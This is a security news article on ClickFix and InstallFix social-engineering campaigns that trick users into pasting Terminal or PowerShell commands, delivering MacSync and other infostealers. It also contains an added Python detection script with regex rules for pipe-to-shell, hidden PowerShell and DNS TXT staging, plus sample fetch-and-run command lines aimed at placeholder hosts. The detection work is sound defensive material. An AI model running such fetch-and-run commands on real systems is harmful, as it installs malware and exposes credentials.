Three different ClickFix campaigns have been found to act as a delivery vector for the deployment of a macOS information stealer called MacSync.
“Unlike traditional exploit-based attacks, this method relies entirely on user interaction – usually in the form of copying and executing commands – making it particularly effective against users who may not appreciate the implications of running unknown and obfuscated terminal commands,” Sophos researchers Jagadeesh Chandraiah, Tonmoy Jitu, Dmitry Samosseiko, and Matt Wixey said.
It’s currently not known if the campaigns are the work of the same threat actor. The use of ClickFix lures to distribute the malware was also flagged by Jamf Threat Labs in December 2025. The details of the three campaigns are as follows –
- November 2025: A campaign that used the OpenAI Atlas browser as bait, delivered via sponsored search results on Google, to direct users to a fake Google Sites URL with a download button that, when clicked, displayed instructions to open the Terminal app and paste a command into it. This action downloads a shell script that prompts the user to enter the system password and then runs MacSync with user-level permissions.
- December 2025: A malvertising campaign that leveraged sponsored links tied to searches for queries like “how to clean up your Mac” on Google to lead users to shared conversations on the legitimate OpenAI ChatGPT site, giving the impression that the links were safe. The ChatGPT conversations redirected victims to malicious GitHub-themed landing pages that tricked users into running malicious commands in the Terminal app.
- February 2026: A campaign targeting Belgium, India, and parts of North and South America that distributed a new variant of MacSync delivered through ClickFix lures. The latest iteration supports dynamic AppleScript payloads and in-memory execution to evade static analysis, bypass behavioral detections, and complicate incident response.
The shell script launched after running the Terminal command is designed to contact a hard-coded server and retrieve the AppleScript infostealer payload, while simultaneously taking steps to remove evidence of data theft. The stealer is equipped to harvest and exfiltrate a wide range of data from compromised hosts, including credentials, files, keychain databases, and seed phrases from cryptocurrency wallets.
The latest findings suggest the threat actors are adapting the formula to stay one step ahead of security tools, while weaponizing the trust associated with ChatGPT conversations to convince users to run malicious commands.
The new variant observed in the most recent campaign “likely represents the malware developer adjusting to OS and software security measures to maintain effectiveness,” Sophos said. “Refinements to the typical ClickFix social engineering tactics are therefore one way in which such campaigns may continue to evolve in the future.”
In recent months, ClickFix campaigns have used legitimate platforms like Cloudflare Pages (pages.dev), Squarespace, and Tencent EdgeOne to host bogus instructions for installing developer tools like Anthropic’s Claude Code. The URLs are distributed via malicious search engine ads.
The instructions, as before, deceive victims into installing infostealer malware like Amatera Stealer instead. The social engineering attack has been codenamed InstallFix or GoogleFix. According to Nati Tal, head of Guardio Labs, similar infection chains lead to the deployment of Alien infostealer on Windows and Atomic Stealer on macOS.
The PowerShell command executed after pasting and running the supposed installation command for Claude Code fetches a legitimate Chrome extension package within a malicious HTML Application (HTA) file, which then launches an obfuscated .NET loader for Alien in memory, per Tal.
“While traditional ClickFix attacks need to manufacture a reason for the user to run a command: a fake CAPTCHA, a fabricated error message, a bogus system prompt — InstallFix doesn’t need any of that,” Push Security said. “The pretext is simply the user wanting to install legit software.”
According to Pillar Security, there have been at least 20 distinct malware campaigns that have targeted artificial intelligence (AI) and vibe coding tools between February and March 2026. These include code editors, AI agents, large language model (LLM) platforms, AI-powered browser extensions, AI video generators, and AI business tools. Of these, nine have been found to target both Windows and macOS, with another seven exclusively affecting macOS users.
“The reason is clear: AI/vibe coding tool users skew heavily toward macOS, and macOS users tend to have higher-value credentials (SSH keys, cloud tokens, cryptocurrency wallets),” Pillar Security researcher Eilon Cohen said.
“The ClickFix/InstallFix technique (tricking users into pasting commands into Terminal) is uniquely effective against developers because curl | sh is a legitimate installation pattern. Homebrew, Rust, nvm, and many other developer tools use this exact pattern. The malicious commands hide in plain sight.”
Needless to say, the effectiveness of ClickFix (and its variants) has led to the tactic being adopted by multiple threat actors and groups. This includes a malicious traffic distribution system (TDS) named KongTuke (aka 404 TDS, Chaya_002, LandUpdate808, and TAG-124), which uses compromised WordPress websites and fake CAPTCHA lures to deliver a Python-based trojan called ModeloRAT.
The attackers inject malicious JavaScript into legitimate WordPress websites; the injected script prompts users to run a PowerShell command that initiates a multi-stage infection process to deploy the trojan.
“The group continues to use this method alongside the newer CrashFix technique, which tricks users into installing a malicious browser extension to initiate infection,” Trend Micro said. “The malware specifically checks whether a system is part of a corporate domain and identifies installed security tools before continuing, suggesting a focus on enterprise environments rather than opportunistic infections.”
That’s not all. KongTuke campaigns have also been spotted using DNS TXT records in their ClickFix script. These DNS TXT records stage a command to retrieve and run a PowerShell script.
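The traits described above, from the curl | sh pattern that hides in plain sight to DNS TXT staging of PowerShell, can be turned into a simple triage pass over process command-line telemetry. The following Python is an added defensive example, not code from Sophos, Pillar Security, Trend Micro, or the article; the rule names, the allowlist of reviewed installer hosts, and the sample command lines are all my own constructions.

```python
import re

# Constructed heuristics for triaging pasted Terminal/PowerShell commands seen in
# process-creation logs. Names are my own, not vendor detection signatures.
RULES = {
    "pipe_to_shell": re.compile(r"\b(curl|wget)\b[^|;]*\|\s*(sudo\s+)?(ba|z)?sh\b", re.I),
    "b64_to_shell": re.compile(r"base64\s+(-d|-D|--decode)\b[^|]*\|\s*(ba|z)?sh\b", re.I),
    "applescript": re.compile(r"\bosascript\b", re.I),
    "ps_hidden_enc": re.compile(
        r"powershell(\.exe)?\b.*(-w(indowstyle)?\s+hidden|-e(nc|ncodedcommand)?\s+[A-Za-z0-9+/=]{20,}|-nop\b)", re.I),
    "dns_txt_stage": re.compile(
        r"(Resolve-DnsName\b.*-Type\s+TXT|nslookup\b.*-(type|q)=txt).*\b(iex|Invoke-Expression)\b", re.I),
    "hta_launch": re.compile(r"\bmshta(\.exe)?\b", re.I),
}
URL_HOST = re.compile(r"https?://([^/\s'\"]+)", re.I)

# Assumed allowlist of installer hosts a team has reviewed. curl | sh from these is
# the legitimate developer pattern the article describes, so it is reported, not flagged.
ALLOWED_HOSTS = {"sh.rustup.rs", "raw.githubusercontent.com"}


def triage(cmdline: str, allowed_hosts=ALLOWED_HOSTS) -> dict:
    """Return the rule names that matched, the URL hosts found, and a verdict."""
    hits = [name for name, rx in RULES.items() if rx.search(cmdline)]
    hosts = [h.lower() for h in URL_HOST.findall(cmdline)]
    # curl | sh alone is ambiguous: suppress it only when every host is allowlisted
    # and no other rule fired on the same command line.
    if hits == ["pipe_to_shell"] and hosts and all(h in allowed_hosts for h in hosts):
        return {"hits": hits, "hosts": hosts, "verdict": "allowlisted_installer"}
    if not hits:
        return {"hits": hits, "hosts": hosts, "verdict": "clean"}
    return {"hits": hits, "hosts": hosts, "verdict": "suspicious"}


def triage_log(lines):
    """Triage a batch of command lines; returns (cmdline, verdict) pairs."""
    return [(line, triage(line)["verdict"]) for line in lines]


SAMPLE_CMDLINES = [  # constructed samples; .invalid hosts never resolve
    "curl --proto '=https' --tlsv1.2 -sSf https://sh.rustup.rs | sh",
    "curl -fsSL https://updates.example.invalid/fix.sh | sh",
    "echo aGVsbG8= | base64 -d | sh",
    'powershell -w hidden -c "Resolve-DnsName cfg.example.invalid -Type TXT ; iex $stage"',
    "osascript -e 'do shell script \"curl -s https://cdn.example.invalid/p | sh\"'",
    "ls -la ~/Library/LaunchAgents",
]

if __name__ == "__main__":
    for cmd, verdict in triage_log(SAMPLE_CMDLINES):
        print(f"{verdict:22} {cmd}")
```

The allowlist only suppresses the bare pipe-to-shell rule; a reviewed host combined with osascript, base64 decoding, or hidden PowerShell is still surfaced.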
Other ClickFix-style pastejacking attacks that have been detected in the wild are listed below –
- Using compromised websites to display lures for ClickFix pages that mimic Google’s “Aw Snap!” error or browser updates to distribute droppers, downloaders, and malicious browser extensions.
- Using ClickFix decoys served via malvertising/phishing links to direct users to malicious pages that lead to the deployment of Remcos RAT.
- Using a fake CAPTCHA verification lure on a phony website promoting a $TEMU airdrop scam to trigger the execution of a PowerShell command that runs arbitrary Python code retrieved from a server.
- Using a bogus website advertising CleanMyMac to trick users into running a malicious Terminal command that deploys a macOS stealer named SHub Stealer and backdoors cryptocurrency wallets such as Exodus, Atomic Wallet, Ledger Wallet, and Ledger Live in order to steal their seed phrases.
- Using a fake CAPTCHA verification lure on compromised websites to run a PowerShell script that delivers an MSI dropper, which then installs the Deno JavaScript runtime to execute obfuscated code that ultimately installs CastleRAT in memory by means of a Python loader named CastleLoader.
In a report published last week, Rapid7 revealed that highly trusted WordPress websites are being compromised as part of an ongoing, widespread campaign designed to inject a ClickFix implant impersonating a Cloudflare human verification challenge. The campaign has been active since December 2025.
More than 250 infected websites have been identified in at least 12 countries, including Australia, Brazil, Canada, Czechia, Germany, India, Israel, Singapore, Slovakia, Switzerland, the U.K., and the U.S. The websites have been identified as regional news outlets and local businesses.
The end goal of these lures is to compromise Windows systems with different stealer malware families: StealC Stealer, an improved version of Vidar Stealer, a .NET stealer dubbed Impure Stealer, and a C++ stealer referred to as VodkaStealer. The stolen data can then act as a launchpad for financial theft or follow-on attacks.
The exact method by which the WordPress sites are hacked is presently not known. However, it’s suspected to involve the exploitation of recently disclosed security flaws in WordPress plugins and themes, previously stolen admin credentials, or publicly accessible wp-admin interfaces.
To counter the threat, site administrators are advised to keep their sites up-to-date, use strong passwords for administrative access, set up two-factor authentication (2FA), and scan for suspicious administrator accounts.
“The best defense for individuals browsing the web is to stay cautious, maintain a zero-trust mindset, use reputable security software, and keep themselves up to date with the latest phishing and ClickFix tactics used by malicious actors,” Rapid7 said. “An important takeaway from this report should be that even trusted websites can be compromised and weaponized against unsuspecting visitors.”
